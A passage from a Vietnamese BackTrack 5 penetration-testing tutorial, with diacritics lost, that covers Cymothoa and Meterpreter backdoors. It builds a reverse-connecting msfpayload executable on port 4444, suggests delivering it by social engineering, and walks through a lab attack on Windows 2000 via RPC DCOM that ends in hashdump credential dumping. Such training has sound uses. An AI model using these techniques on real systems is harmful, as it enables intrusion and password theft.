Cymothoa trên bt k h thng nào và có th lây nhim vào bt k mt cng dch v nào ca h thng
đó và chúng ta có th maintaining access vào h thng đó bt k lúc nào .Victim s không h hay bit
s tn ti ca backdoor, ngoi tr victim phát hin hay nghi ng mt điu bt thng nào đó trên h
thng ca h .
 có đc id ca tin trình trong BackTrack 5 chúng ta s dng câu lnh ps –aux trong môi
trng Cymothoa shell .

Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 22

3. Meterpreter có phi là backdoor :

Trong phn trc chúng ta đã đc gii thiu s qua v meterpreter nh là mt phn không th
thiu ca b công c Metasploit Framework, nó đc dùng đ thu thp thông tin và to 1 phiên làm
vic trong môi trng shell ca h thng victim .Trong phn này chúng ta s đc gii thiu s dng
meterpreter nh mt backdoor trong BackTrack 5 .
Câu lnh s dng :


/opt/framework/msf3/msfpayload [<options>] <payload> [actions]



ây là cách mà các attacker mun quay tr li h thng ca victim nhiu ln, mà không cn
victim phi click hay thc thi mt mã đc nào c .Anh em cn phi hiu thc s v Metasploit và
Meterpreter, có th tham kho cun hng dn s dng Metasploit ( s đc cung cp trong thi
gian sm nht ) và các phn hng dn trc v BackTrack 5 ca cutynhangheo .

Hình 22 :
To mt backdoor exe s dng msfpayload .

Trong hình 22 anh em có th thy đc file exploit.exe, đây là mã đc ca msf meterpreter
payload đc to ra bng câu lnh msfpayload .Tip tc trong phn hng dn này, chúng ta s to
ra 1 backdoor luôn luôn lng nghe  cng 4444 vi phng pháp payloads, h thng ca victim s
luôn luôn kt ni v đa ch ca attacker 192.168.13.132 trên cng 4444 .

Hình 23 :
Handler đc to ra trong Metasploit đ lng nghe backdoor .

S dng Metasploit, to ra mt handler và thit lp các tùy chn LHOST và LPORT trong
msfpayload console .Sau khi đã thc hin xong, ch cn chy exploit .Exploit này có th chy trên bt
c mt mc tiêu nào .Bt c khi nào victim click lên file này – anh em có th gi cho victim bng
cách s dng k thut social engineering hay bt k mt phng pháp trá hình nào cng đc – nó s
lng nghe LHOST và kt ni ngc v attacker thông qua LPORT .Ngay lp tc khi victim thc thi
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 23

file này trên h thng ca h, meterpreter shell s khi to ngay lp tc mt kt ni tc thì .Lúc này
anh em cng có th hình dung ra attacker có th làm điu gì ri hen .



Hình 24 : H thng victim b truy cp bi BT5 thông qua backdoor .

4. Li dng l hng đ có backdoor :

Backdoor là mt kênh kt ni bí mt vào h thng .Các attacker có th truy cp không b hn ch
vào h thng victim bng cách s dng các backdoor, phng pháp này s tit kim thi gian và các
n lc ca k thut tn công ban đu .iu quan trng  pentester đó là cn phi thc nghim xâm
nhp h thng và tin hành đánh giá xem h thng đó có d dàng b chim quyn điu khin bi
backdoor hay không, đ ngn nga vic truy cp trái phép này pentester có th s dng các bn vá
li phù hp cho h thng đó .
Các l hng ph bin nht hin nay to điu kin cho vic tn công và chim quyn điu khin
ca backdoor đó là li tràn b đm, cross-site scripting ( XSS ) và qun tr t xa .Phng pháp phòng
v ph bin nht bao gm thng xuyên thay đi chính sách bo mt da trên các kch bn có th xy
ra đ gim thiu mi đe doa có th gây thit hi cho c quan, t chc, thc hin phng pháp kim
soát s an toàn ca phn mm thng xuyên và phi đúng theo tiêu chun bo mt trong lp trình,
cn phi đm bo chc chn kim tra mc đ bo mt v mt ng dng và phi thc hin sa đi các
vn đ đó mt cách thng xuyên .
Trong phn hng dn này, chúng ta đã bit đc làm th nào đ s dng k thut n mình trong
các cuc tn công và xâm nhp .Trong phn hng dn k tip cng là phn kt thúc trong series
hng dn s dng BackTrack 5, cutynhangheo s trình bày mt cuc tn công da trên mt kch bn
gi đnh và s s dng BackTrack 5 đ thc hin, cuc tn công gi đnh này s s dng tt c các
phng pháp và k thut đã đc gii thiu  các phn trên .







Tài liu hng dn s dng BackTrack 5 – Ting Vit

2012

Ngi biên dch : Trang 24

Phn V : Chi tit mt cuc tn công gi đnh
Trong bn phn trc ca cun hng dn s dng BackTrack 5, cutynhangheo đã gii thích chi tit
tng giai đon ca quá trình thc nghim xâm nhp .Phn cui cùng này chúng ta s cô đng li tt c t
trc cho đn bây gi, và chúng ta s có cái nhìn nhn khách quan v các khía cnh khác nhau ca đo
đc hacking và thc nghim xâm nhp .
i vi phn hng dn này, chúng ta cn thit lp mt h thng lab nh sau : 1 máy o chy
Windows 7, 1 máy o chy BackTrack 5 và 1 s máy o chy các Windows khác .Chúng ta s đi qua tng
bc ca quá trình tn công và c gng xâm nhp vào h thng mng này nhé .
1. B công c Autoscan Network trong BackTrack 5 :

Sau khi kt ni vào h thng mng, bc đu tiên chúng ta cn scan cu trúc h thng mng và
kim tra xem các h thng đang live trong h thng mng đó . thc hin vic này, chúng ta s
dng b công c Autoscan Network trong BackTrack 5 .ng dn đn b công c nh sau :

Application 
Backtrack  Information gathering  Network analys  Network scanners 
Autoscan .

Hình 25 : Autoscan Network 1.5 .

Nh hình 25 thì Autoscan Network 1.5 là mt b công c có tính nng scan cu trúc h thng
mng, nó s lit kê tt c các đa ch IP đang đc s dng, chi tit v hostname, users và các h điu
hành đang hot đng trên h thng mng .
Nh các phn hng dn trên, anh em có th s dng Nmap đ làm vic này cng đc .Trc
khi thc hin tn công, chúng ta s thc hin bc phân tích l hng trên mc tiêu cn tn công .
Gi s mc tiêu ca chúng ta có đa ch IP là 192.168.13.129, đang s dng h điu hành

Windows 2000 server, chúng ta có th s dng Nessus hay OpenVAS đ kim tra l hng ca h điu
hành này .Tuy nhiên trong phn hng dn này, cutynhangheo mun anh em nên s dng phng
pháp kim tra l hng bng tay nhé .

2. Tài nguyên l hng trc tuyn :

Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 25

Website cung cp các thông tin v l hng ph bin nht nh National Vulnerability Database ti
đa ch
cung cp các thông tin v các l hng khác nhau
cho mt h thng c th .

Hình 26 : National Vulnerability Database Search .

3. Pentest mc tiêu :
Trong phn hng dn này, cutynhangheo s s dng l hng trong Windows 2000 Server đó là
l hng RPC DCOM port cho phép thc thi mã t xa, dn đn vic làm tràn b đm ca h thng
.Trong phn hng dn Metasploit, chúng ta đã bit cách làm th nào đ khai thác các l hng trên
mc tiêu .Nó s khi to 1 meterpreter shell trên h thng Windows 2000 Server có IP là
192.168.13.129, nh hình 27 bên di .BackTrack 5 còn cung cp b công c nh SET, có th đc
s dng đ xâm nhp h thng .

Hình 27 :
Bên trong h thng Windows 2000 Server .

Mt khi chúng ta đã xâm nhp vào bên trong h thng đc, thông tin chi tit v h thng ta có

th thu thp đc .Sau đây là mt s lnh quan trong đ thc hin vic đó :

3.1. Hashdump :
ây là câu lnh dùng đ dump password hashes ( NT/LM ) ca h thng mc
tiêu, thông tin này đc dùng đ crack password v sau đ leo thang đc quyn trên h thng
mc tiêu .
3.2. Sysinfo :
ây là câu lnh dùng đ thu thp thông tin chi tit v h thng mc tiêu nh là h
điu hành, nhà cung cp, tên admin và nhiu th khác .

×